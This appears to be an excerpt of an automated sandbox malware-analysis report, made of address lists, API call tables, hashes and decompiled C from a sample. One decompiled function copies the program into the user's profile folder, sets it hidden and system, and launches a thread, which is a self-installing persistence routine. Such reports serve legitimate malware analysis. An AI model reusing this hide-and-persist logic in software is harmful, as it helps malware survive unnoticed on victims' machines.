                                                                                                                                                                                                                                                    0x00ec6b99
                                                                                                                                                                                                                                                    0x00ec6b9e
                                                                                                                                                                                                                                                    0x00ec6b9e
                                                                                                                                                                                                                                                    0x00ec6ba1
                                                                                                                                                                                                                                                    0x00ec6ba7
                                                                                                                                                                                                                                                    0x00ec6baa
                                                                                                                                                                                                                                                    0x00ec6bb8
                                                                                                                                                                                                                                                    0x00ec6bbd
                                                                                                                                                                                                                                                    0x00ec6bbd
                                                                                                                                                                                                                                                    0x00ec6bc0
                                                                                                                                                                                                                                                    0x00ec6bc0
                                                                                                                                                                                                                                                    0x00ec6bc7
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6b49
                                                                                                                                                                                                                                                    0x00ec6761
                                                                                                                                                                                                                                                    0x00ec676b
                                                                                                                                                                                                                                                    0x00ec6775
                                                                                                                                                                                                                                                    0x00ec677f
                                                                                                                                                                                                                                                    0x00ec6785
                                                                                                                                                                                                                                                    0x00ec6788
                                                                                                                                                                                                                                                    0x00ec685c
                                                                                                                                                                                                                                                    0x00ec6861
                                                                                                                                                                                                                                                    0x00ec6864
                                                                                                                                                                                                                                                    0x00ec678e
                                                                                                                                                                                                                                                    0x00ec6797
                                                                                                                                                                                                                                                    0x00ec67ad
                                                                                                                                                                                                                                                    0x00ec67b3
                                                                                                                                                                                                                                                    0x00ec67b9
                                                                                                                                                                                                                                                    0x00ec67c0
                                                                                                                                                                                                                                                    0x00ec67dc
                                                                                                                                                                                                                                                    0x00ec67e1
                                                                                                                                                                                                                                                    0x00ec67e7
                                                                                                                                                                                                                                                    0x00ec67f0
                                                                                                                                                                                                                                                    0x00ec67f5
                                                                                                                                                                                                                                                    0x00ec67f8
                                                                                                                                                                                                                                                    0x00ec67fe
                                                                                                                                                                                                                                                    0x00ec6804
                                                                                                                                                                                                                                                    0x00ec6807
                                                                                                                                                                                                                                                    0x00ec6819
                                                                                                                                                                                                                                                    0x00ec681f
                                                                                                                                                                                                                                                    0x00ec683a
                                                                                                                                                                                                                                                    0x00ec683f
                                                                                                                                                                                                                                                    0x00ec683f
                                                                                                                                                                                                                                                    0x00ec6807
                                                                                                                                                                                                                                                    0x00ec6850
                                                                                                                                                                                                                                                    0x00ec6850
                                                                                                                                                                                                                                                    0x00ec6856
                                                                                                                                                                                                                                                    0x00ec686a
                                                                                                                                                                                                                                                    0x00ec6871
                                                                                                                                                                                                                                                    0x00ec6877
                                                                                                                                                                                                                                                    0x00ec687a
                                                                                                                                                                                                                                                    0x00ec687e
                                                                                                                                                                                                                                                    0x00ec688c
                                                                                                                                                                                                                                                    0x00ec6891
                                                                                                                                                                                                                                                    0x00ec6891
                                                                                                                                                                                                                                                    0x00ec6894
                                                                                                                                                                                                                                                    0x00ec689a
                                                                                                                                                                                                                                                    0x00ec689d
                                                                                                                                                                                                                                                    0x00ec68a5
                                                                                                                                                                                                                                                    0x00ec68aa
                                                                                                                                                                                                                                                    0x00ec68ad
                                                                                                                                                                                                                                                    0x00ec68b9
                                                                                                                                                                                                                                                    0x00ec68bf
                                                                                                                                                                                                                                                    0x00ec68c5
                                                                                                                                                                                                                                                    0x00ec68c8
                                                                                                                                                                                                                                                    0x00ec6902
                                                                                                                                                                                                                                                    0x00ec690a
                                                                                                                                                                                                                                                    0x00ec690d
                                                                                                                                                                                                                                                    0x00ec6920
                                                                                                                                                                                                                                                    0x00ec6925
                                                                                                                                                                                                                                                    0x00ec6931
                                                                                                                                                                                                                                                    0x00ec6931
                                                                                                                                                                                                                                                    0x00ec68ca
                                                                                                                                                                                                                                                    0x00ec68d6
                                                                                                                                                                                                                                                    0x00ec68e4
                                                                                                                                                                                                                                                    0x00ec68e4
                                                                                                                                                                                                                                                    0x00ec693a
                                                                                                                                                                                                                                                    0x00ec693d
                                                                                                                                                                                                                                                    0x00ec694b
                                                                                                                                                                                                                                                    0x00ec695a
                                                                                                                                                                                                                                                    0x00ec6971
                                                                                                                                                                                                                                                    0x00ec6977
                                                                                                                                                                                                                                                    0x00ec6984
                                                                                                                                                                                                                                                    0x00ec6984
                                                                                                                                                                                                                                                    0x00ec693d
                                                                                                                                                                                                                                                    0x00ec698a
                                                                                                                                                                                                                                                    0x00ec6990
                                                                                                                                                                                                                                                    0x00ec6993
                                                                                                                                                                                                                                                    0x00ec69a1
                                                                                                                                                                                                                                                    0x00ec69a6
                                                                                                                                                                                                                                                    0x00ec69a6
                                                                                                                                                                                                                                                    0x00ec69a9
                                                                                                                                                                                                                                                    0x00ec69a9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec69b0
                                                                                                                                                                                                                                                    0x00ec6667
                                                                                                                                                                                                                                                    0x00ec666d
                                                                                                                                                                                                                                                    0x00ec6674
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6689
                                                                                                                                                                                                                                                    0x00ec6693
                                                                                                                                                                                                                                                    0x00ec6698
                                                                                                                                                                                                                                                    0x00ec669b
                                                                                                                                                                                                                                                    0x00ec66a7
                                                                                                                                                                                                                                                    0x00ec66b8
                                                                                                                                                                                                                                                    0x00ec66c6
                                                                                                                                                                                                                                                    0x00ec66d5
                                                                                                                                                                                                                                                    0x00ec66e4
                                                                                                                                                                                                                                                    0x00ec66f0
                                                                                                                                                                                                                                                    0x00ec66ff
                                                                                                                                                                                                                                                    0x00ec670e
                                                                                                                                                                                                                                                    0x00ec671d
                                                                                                                                                                                                                                                    0x00ec673a
                                                                                                                                                                                                                                                    0x00ec6747
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6747
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6642
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec65fe
                                                                                                                                                                                                                                                    0x00ec64ae
                                                                                                                                                                                                                                                    0x00ec64b4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec64cb
                                                                                                                                                                                                                                                    0x00ec64dc
                                                                                                                                                                                                                                                    0x00ec64ed
                                                                                                                                                                                                                                                    0x00ec64f2
                                                                                                                                                                                                                                                    0x00ec651a
                                                                                                                                                                                                                                                    0x00ec653f
                                                                                                                                                                                                                                                    0x00ec6545
                                                                                                                                                                                                                                                    0x00ec654c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec6552
                                                                                                                                                                                                                                                    0x00ec655c
                                                                                                                                                                                                                                                    0x00ec657e
                                                                                                                                                                                                                                                    0x00ec6584
                                                                                                                                                                                                                                                    0x00ec6586
                                                                                                                                                                                                                                                    0x00ec65dd
                                                                                                                                                                                                                                                    0x00ec65dd
                                                                                                                                                                                                                                                    0x00ec65e4
                                                                                                                                                                                                                                                    0x00ec65ed
                                                                                                                                                                                                                                                    0x00ec65ed
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec65e4
                                                                                                                                                                                                                                                    0x00ec658e
                                                                                                                                                                                                                                                    0x00ec6591
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec65a0
                                                                                                                                                                                                                                                    0x00ec65a6
                                                                                                                                                                                                                                                    0x00ec65b2
                                                                                                                                                                                                                                                    0x00ec65b7
                                                                                                                                                                                                                                                    0x00ec65ba
                                                                                                                                                                                                                                                    0x00ec65c0
                                                                                                                                                                                                                                                    0x00ec65c7
                                                                                                                                                                                                                                                    0x00ec65d8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec65d8
                                                                                                                                                                                                                                                    0x00ec65c9
                                                                                                                                                                                                                                                    0x00ec65d0
                                                                                                                                                                                                                                                    0x00ec65d0
                                                                                                                                                                                                                                                    0x00ec6464
                                                                                                                                                                                                                                                    0x00ec646d
                                                                                                                                                                                                                                                    0x00ec6476
                                                                                                                                                                                                                                                    0x00ec6479
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec647b
                                                                                                                                                                                                                                                    0x00ec6c33
                                                                                                                                                                                                                                                    0x00ec6c36
                                                                                                                                                                                                                                                    0x00ec6c44
                                                                                                                                                                                                                                                    0x00ec6c38
                                                                                                                                                                                                                                                    0x00ec6c38
                                                                                                                                                                                                                                                    0x00ec6c38
                                                                                                                                                                                                                                                    0x00ec6c36
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec62e0

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00EC63BD
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 00EC6408
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                    • String ID: TEMP$TEMP$Topdawabe
                                                                                                                                                                                                                                                    • API String ID: 2087232378-2420129230
                                                                                                                                                                                                                                                    • Opcode ID: 7a5c415347b309f894b7a622370972dcf84846f8ec17d06a5582081bed79cebf
                                                                                                                                                                                                                                                    • Instruction ID: 7cf0ae4c13f72e8d607537986f74d7de6fd6180fd789d514ae97fde68a8910eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a5c415347b309f894b7a622370972dcf84846f8ec17d06a5582081bed79cebf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A5238B0A002189FDB14DF94DD89FAEB7B5BB48304F24859CE509B7291D772AE86CF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                                                    			E00EC4020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                    				signed int _v5;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                    				long _v48;
                                                                                                                                                                                                                                                    				void* _v52;
                                                                                                                                                                                                                                                    				void _v56;
                                                                                                                                                                                                                                                    				long _v60;
                                                                                                                                                                                                                                                    				HANDLE* _v64;
                                                                                                                                                                                                                                                    				void* _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				void* _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                                                    				void _v92;
                                                                                                                                                                                                                                                    				long _v96;
                                                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                                                    				HANDLE* _v104;
                                                                                                                                                                                                                                                    				HANDLE* _v108;
                                                                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                                                                    				void* _t141;
                                                                                                                                                                                                                                                    				void* _t188;
                                                                                                                                                                                                                                                    				void* _t189;
                                                                                                                                                                                                                                                    				void* _t191;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                    					E00EC7D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                    					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                    					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                    					_v16 = _a24;
                                                                                                                                                                                                                                                    					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                    					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                    					_v60 = 0;
                                                                                                                                                                                                                                                    					while(_v60 < _a16) {
                                                                                                                                                                                                                                                    						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                    						if(_v52 != 0) {
                                                                                                                                                                                                                                                    							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                    							_v52 = 0;
                                                                                                                                                                                                                                                    							_v48 = 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t198 = _v56;
                                                                                                                                                                                                                                                    						if(_v56 != 0) {
                                                                                                                                                                                                                                                    							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                    							_v56 = 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						ResetEvent(_v20);
                                                                                                                                                                                                                                                    						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                    						_t114 = CreateThread(0, 0, E00EC4AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                    						_v56 = _t114;
                                                                                                                                                                                                                                                    						_v104 = E00EC97A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                    						_v64 = _v104;
                                                                                                                                                                                                                                                    						E00EC7D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                    						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                    						_v100 = 0;
                                                                                                                                                                                                                                                    						while(_v100 < _a20) {
                                                                                                                                                                                                                                                    							_v64[_v100] = 0;
                                                                                                                                                                                                                                                    							E00EC7D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                    							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                    							_v68 =  &_v56;
                                                                                                                                                                                                                                                    							_v72 = _a12;
                                                                                                                                                                                                                                                    							_v92 = _a4;
                                                                                                                                                                                                                                                    							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                    							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                    								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                    							_t141 = CreateThread(0, 0, E00EC4BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                    							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                    							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                    							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                    							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                    						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                    						if(_v96 == 0) {
                                                                                                                                                                                                                                                    							_v5 = 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                    						if(_v96 != 0) {
                                                                                                                                                                                                                                                    							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                    						if(_v52 != 0) {
                                                                                                                                                                                                                                                    							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    							_v52 = 0;
                                                                                                                                                                                                                                                    							_v48 = 0;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                    						_v108 = _v64;
                                                                                                                                                                                                                                                    						E00EC97C0(_v108);
                                                                                                                                                                                                                                                    						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                    						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                    0x00ec4026
                                                                                                                                                                                                                                                    0x00ec402e
                                                                                                                                                                                                                                                    0x00ec405a
                                                                                                                                                                                                                                                    0x00ec405f
                                                                                                                                                                                                                                                    0x00ec4066
                                                                                                                                                                                                                                                    0x00ec406f
                                                                                                                                                                                                                                                    0x00ec4080
                                                                                                                                                                                                                                                    0x00ec4086
                                                                                                                                                                                                                                                    0x00ec408a
                                                                                                                                                                                                                                                    0x00ec408d
                                                                                                                                                                                                                                                    0x00ec409f
                                                                                                                                                                                                                                                    0x00ec40af
                                                                                                                                                                                                                                                    0x00ec40b9
                                                                                                                                                                                                                                                    0x00ec40c6
                                                                                                                                                                                                                                                    0x00ec40cc
                                                                                                                                                                                                                                                    0x00ec40d3
                                                                                                                                                                                                                                                    0x00ec40d3
                                                                                                                                                                                                                                                    0x00ec40da
                                                                                                                                                                                                                                                    0x00ec40de
                                                                                                                                                                                                                                                    0x00ec40e6
                                                                                                                                                                                                                                                    0x00ec40ec
                                                                                                                                                                                                                                                    0x00ec40ec
                                                                                                                                                                                                                                                    0x00ec40f7
                                                                                                                                                                                                                                                    0x00ec4101
                                                                                                                                                                                                                                                    0x00ec4118
                                                                                                                                                                                                                                                    0x00ec411e
                                                                                                                                                                                                                                                    0x00ec413d
                                                                                                                                                                                                                                                    0x00ec4143
                                                                                                                                                                                                                                                    0x00ec4153
                                                                                                                                                                                                                                                    0x00ec4158
                                                                                                                                                                                                                                                    0x00ec415b
                                                                                                                                                                                                                                                    0x00ec416d
                                                                                                                                                                                                                                                    0x00ec417f
                                                                                                                                                                                                                                                    0x00ec418e
                                                                                                                                                                                                                                                    0x00ec4193
                                                                                                                                                                                                                                                    0x00ec4199
                                                                                                                                                                                                                                                    0x00ec419f
                                                                                                                                                                                                                                                    0x00ec41a5
                                                                                                                                                                                                                                                    0x00ec41af
                                                                                                                                                                                                                                                    0x00ec41bb
                                                                                                                                                                                                                                                    0x00ec41d2
                                                                                                                                                                                                                                                    0x00ec41bd
                                                                                                                                                                                                                                                    0x00ec41c7
                                                                                                                                                                                                                                                    0x00ec41c7
                                                                                                                                                                                                                                                    0x00ec41e3
                                                                                                                                                                                                                                                    0x00ec41f7
                                                                                                                                                                                                                                                    0x00ec4203
                                                                                                                                                                                                                                                    0x00ec420c
                                                                                                                                                                                                                                                    0x00ec4216
                                                                                                                                                                                                                                                    0x00ec416a
                                                                                                                                                                                                                                                    0x00ec416a
                                                                                                                                                                                                                                                    0x00ec422d
                                                                                                                                                                                                                                                    0x00ec4242
                                                                                                                                                                                                                                                    0x00ec4249
                                                                                                                                                                                                                                                    0x00ec424b
                                                                                                                                                                                                                                                    0x00ec424b
                                                                                                                                                                                                                                                    0x00ec425e
                                                                                                                                                                                                                                                    0x00ec4265
                                                                                                                                                                                                                                                    0x00ec426d
                                                                                                                                                                                                                                                    0x00ec426d
                                                                                                                                                                                                                                                    0x00ec4277
                                                                                                                                                                                                                                                    0x00ec4281
                                                                                                                                                                                                                                                    0x00ec428e
                                                                                                                                                                                                                                                    0x00ec4294
                                                                                                                                                                                                                                                    0x00ec429b
                                                                                                                                                                                                                                                    0x00ec429b
                                                                                                                                                                                                                                                    0x00ec42a6
                                                                                                                                                                                                                                                    0x00ec42af
                                                                                                                                                                                                                                                    0x00ec42b6
                                                                                                                                                                                                                                                    0x00ec42bb
                                                                                                                                                                                                                                                    0x00ec42c4
                                                                                                                                                                                                                                                    0x00ec409c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec42c6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec42c4
                                                                                                                                                                                                                                                    0x00ec42d1
                                                                                                                                                                                                                                                    0x00ec42d1
                                                                                                                                                                                                                                                    0x00ec42dd

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?), ref: 00EC4066
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EC407A
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?), ref: 00EC40AF
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC40C6
                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 00EC40E6
                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000000), ref: 00EC40F7
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00EC4101
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00EC4118
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EC41DD
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00EC41F7
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC420C
                                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 00EC4216
                                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00EC422D
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00EC423C
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00EC4258
                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 00EC426D
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00EC4277
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC428E
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00EC42A6
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?), ref: 00EC42D1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1593741596-0
                                                                                                                                                                                                                                                    • Opcode ID: b48fc0f9dc3221207a7e0263be1c0e8d0c2115b2a04160a9ffafe0b7f5af886c
                                                                                                                                                                                                                                                    • Instruction ID: 248851b33a1bdc1cd63fdd84d52651edfe7432d4a5a1e739e8bcc9fb634e6b65
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b48fc0f9dc3221207a7e0263be1c0e8d0c2115b2a04160a9ffafe0b7f5af886c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 259134B0900208EFEB14DFA5D99AFEEBBB1BB08304F244119F905BB2D0D7769946CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 567 ec1120-ec1134 568 ec113a-ec113e 567->568 569 ec12bb-ec12c1 567->569 568->569 570 ec1144-ec1150 lstrlenA 568->570 570->569 571 ec1156-ec1162 lstrlenA 570->571 571->569 572 ec1168-ec1175 571->572 573 ec118a-ec119b GetEnvironmentVariableA 572->573 574 ec1177-ec1188 GetAllUsersProfileDirectoryA 572->574 575 ec11a1-ec11d9 wnsprintfA lstrcmpiA 573->575 574->575 576 ec11db-ec11e1 575->576 577 ec1216-ec1287 call ec97a0 lstrcpyA * 2 CreateThread 575->577 576->577 578 ec11e3-ec1210 CopyFileA SetFileAttributesA lstrcpyA 576->578 581 ec1289-ec128d 577->581 582 ec12a3-ec12b8 call ec97c0 577->582 578->577 583 ec128f-ec1298 581->583 584 ec129a-ec12a1 581->584 582->569 583->584 584->569
                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                    			E00EC1120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
                                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                                                    				void* _v288;
                                                                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                                                                    				void* _v560;
                                                                                                                                                                                                                                                    				void* _v564;
                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
                                                                                                                                                                                                                                                    					_v12 = 0x104;
                                                                                                                                                                                                                                                    					if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
                                                                                                                                                                                                                                                    					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						CopyFileA(_a4,  &_v556, 0);
                                                                                                                                                                                                                                                    						SetFileAttributesA( &_v556, 6);
                                                                                                                                                                                                                                                    						lstrcpyA(_a4,  &_v556);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v560 = E00EC97A0(0x30d);
                                                                                                                                                                                                                                                    					_v16 = _v560;
                                                                                                                                                                                                                                                    					 *((char*)(_v16 + 0x30c)) = _a12;
                                                                                                                                                                                                                                                    					lstrcpyA(_v16,  &_v556);
                                                                                                                                                                                                                                                    					lstrcpyA(_v16 + 0x208, _a8);
                                                                                                                                                                                                                                                    					_t58 = CreateThread(0, 0, E00EC12D0, _v16, 0, 0); // executed
                                                                                                                                                                                                                                                    					_v288 = _t58;
                                                                                                                                                                                                                                                    					if(_v288 == 0) {
                                                                                                                                                                                                                                                    						_v564 = _v16;
                                                                                                                                                                                                                                                    						E00EC97C0(_v564);
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						if(_a20 != 0) {
                                                                                                                                                                                                                                                    							 *_a20 = _v288;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v8 = 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                    0x00ec1129
                                                                                                                                                                                                                                                    0x00ec1134
                                                                                                                                                                                                                                                    0x00ec1168
                                                                                                                                                                                                                                                    0x00ec1175
                                                                                                                                                                                                                                                    0x00ec119b
                                                                                                                                                                                                                                                    0x00ec1177
                                                                                                                                                                                                                                                    0x00ec1182
                                                                                                                                                                                                                                                    0x00ec1182
                                                                                                                                                                                                                                                    0x00ec11bd
                                                                                                                                                                                                                                                    0x00ec11d9
                                                                                                                                                                                                                                                    0x00ec11f0
                                                                                                                                                                                                                                                    0x00ec11ff
                                                                                                                                                                                                                                                    0x00ec1210
                                                                                                                                                                                                                                                    0x00ec1210
                                                                                                                                                                                                                                                    0x00ec1223
                                                                                                                                                                                                                                                    0x00ec122f
                                                                                                                                                                                                                                                    0x00ec1238
                                                                                                                                                                                                                                                    0x00ec1249
                                                                                                                                                                                                                                                    0x00ec125d
                                                                                                                                                                                                                                                    0x00ec1274
                                                                                                                                                                                                                                                    0x00ec127a
                                                                                                                                                                                                                                                    0x00ec1287
                                                                                                                                                                                                                                                    0x00ec12a6
                                                                                                                                                                                                                                                    0x00ec12b3
                                                                                                                                                                                                                                                    0x00ec1289
                                                                                                                                                                                                                                                    0x00ec128d
                                                                                                                                                                                                                                                    0x00ec1298
                                                                                                                                                                                                                                                    0x00ec1298
                                                                                                                                                                                                                                                    0x00ec129a
                                                                                                                                                                                                                                                    0x00ec129a
                                                                                                                                                                                                                                                    0x00ec1287
                                                                                                                                                                                                                                                    0x00ec12c1

                                                                                                                                                                                                                                                    APIs
